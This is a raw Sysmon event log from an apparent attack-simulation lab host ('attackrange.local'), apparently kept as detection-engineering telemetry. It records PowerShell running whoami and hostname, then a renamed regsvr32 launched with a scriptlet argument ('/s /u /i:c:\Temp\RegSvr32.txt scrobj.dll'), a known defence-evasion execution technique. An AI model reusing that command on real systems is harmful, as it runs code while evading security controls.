22:13:27.897{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b203-000000001100}8580C:\Temp\notregsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rpcss.dll+46b32|c:\windows\system32\rpcss.dll+46af3|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361341Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.835{8e433fbf-2a45-6013-2700-000000001100}162411036C:\Windows\System32\svchost.exe{8e433fbf-3707-6013-b203-000000001100}8580C:\Temp\notregsvr32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1d60|c:\windows\system32\themeservice.dll+1595|c:\windows\system32\themeservice.dll+1461|c:\windows\system32\themeservice.dll+1886|C:\Windows\SYSTEM32\ntdll.dll+2f6d5|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361340Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.835{8e433fbf-2a45-6013-2700-000000001100}16242136C:\Windows\System32\svchost.exe{8e433fbf-3707-6013-b203-000000001100}8580C:\Temp\notregsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1a9a|c:\windows\system32\themeservice.dll+1736|c:\windows\system32\themeservice.dll+6026|c:\windows\system32\themeservice.dll+ad9a|c:\windows\system32\themeservice.dll+9dcf|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361339Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.819{8e433fbf-3378-6013-6702-000000001100}29326308C:\Windows\system32\csrss.exe{8e433fbf-3707-6013-b203-000000001100}8580C:\Temp\notregsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000361338Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.819{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361337Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.819{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361336Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.819{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361335Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.819{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361334Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.819{8e433fbf-3707-6013-b103-000000001100}47169952C:\Windows\system32\cmd.exe{8e433fbf-3707-6013-b203-000000001100}8580C:\Temp\notregsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Windows\system32\cmd.exe+134fb|C:\Windows\system32\cmd.exe+1489f|C:\Windows\system32\cmd.exe+c0c1|C:\Windows\system32\cmd.exe+b5e1|C:\Windows\system32\cmd.exe+124e4|C:\Windows\system32\cmd.exe+180dd|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000361333Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.822{8e433fbf-3707-6013-b203-000000001100}8580C:\Temp\notregsvr32.exe10.0.18362.1 (WinBuild.160101.0800)Microsoft(C) Register ServerMicrosoft® Windows® Operating SystemMicrosoft CorporationREGSVR32.EXEC:\Temp\notregsvr32.exe /s /u /i:c:\Temp\RegSvr32.txt scrobj.dll C:\Users\ADMINI~1\AppData\Local\Temp\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=578BAB56836A3FE455FFC7883041825B,SHA256=8FFC7F80EFBF746E49F37EA3D140F042CF71EF20B4DA2A8F02688E79295DA11D,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F{8e433fbf-3707-6013-b103-000000001100}4716C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Temp\notregsvr32.exe /s /u /i:c:\Temp\RegSvr32.txt scrobj.dll" 10341000x8000000000000000361332Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.803{8e433fbf-3433-6013-2303-000000001100}92689624C:\Windows\system32\conhost.exe{8e433fbf-3707-6013-b103-000000001100}4716C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361331Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.803{8e433fbf-3433-6013-2203-000000001100}66805812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8e433fbf-3707-6013-b103-000000001100}4716C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c01f5|UNKNOWN(00007FFC8F2B5DD3) 10341000x8000000000000000361330Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.803{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361329Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.803{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361328Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.803{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361327Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.803{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361326Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.803{8e433fbf-3378-6013-6702-000000001100}29326308C:\Windows\system32\csrss.exe{8e433fbf-3707-6013-b103-000000001100}4716C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000361325Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.803{8e433fbf-3433-6013-2203-000000001100}66805812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8e433fbf-3707-6013-b103-000000001100}4716C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|UNKNOWN(00007FFC8EF99C27) 154100x8000000000000000361324Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.807{8e433fbf-3707-6013-b103-000000001100}4716C:\Windows\System32\cmd.exe10.0.18362.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\Temp\notregsvr32.exe /s /u /i:c:\Temp\RegSvr32.txt scrobj.dll" C:\Users\ADMINI~1\AppData\Local\Temp\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=9D59442313565C2E0860B88BF32B2277,SHA256=D0CEB18272966AB62B8EDFF100E9B4A6A3CB5DC0F2A32B2B18721FEA2D9C09A5,IMPHASH=272245E2988E1E430500B852C4FB5E18{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 13241300x8000000000000000361323Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:13:27.803{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1117338214-1411020952-3261875682-500\\Device\HarddiskVolume2\Windows\System32\cmd.exeBinary Data 11241100x8000000000000000361322Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.803{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-01-28 22:13:27.803 11241100x8000000000000000361321Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.803{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-01-28 22:13:27.803 10341000x8000000000000000361320Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.647{8e433fbf-3433-6013-2303-000000001100}92689624C:\Windows\system32\conhost.exe{8e433fbf-3707-6013-b003-000000001100}6816C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361319Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.647{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361318Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.647{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361317Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.647{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361316Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.647{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361315Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.647{8e433fbf-3378-6013-6702-000000001100}29323112C:\Windows\system32\csrss.exe{8e433fbf-3707-6013-b003-000000001100}6816C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000361314Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.647{8e433fbf-3433-6013-2203-000000001100}66805812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8e433fbf-3707-6013-b003-000000001100}6816C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c4179|UNKNOWN(00007FFC8EDAE154) 154100x8000000000000000361313Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.651{8e433fbf-3707-6013-b003-000000001100}6816C:\Windows\System32\whoami.exe10.0.18362.1 (WinBuild.160101.0800)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=2EEEEC89E705F73FFBCAE014E1828788,SHA256=A8A4C4719113B071BB50D67F6E12C188B92C70EEAFDFCD6F5DA69B6AAA99A7FD,IMPHASH=7FF0758B766F747CE57DFAC70743FB88{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x8000000000000000361312Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.632{8e433fbf-3433-6013-2303-000000001100}92689624C:\Windows\system32\conhost.exe{8e433fbf-3707-6013-af03-000000001100}8612C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361311Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.616{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361310Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 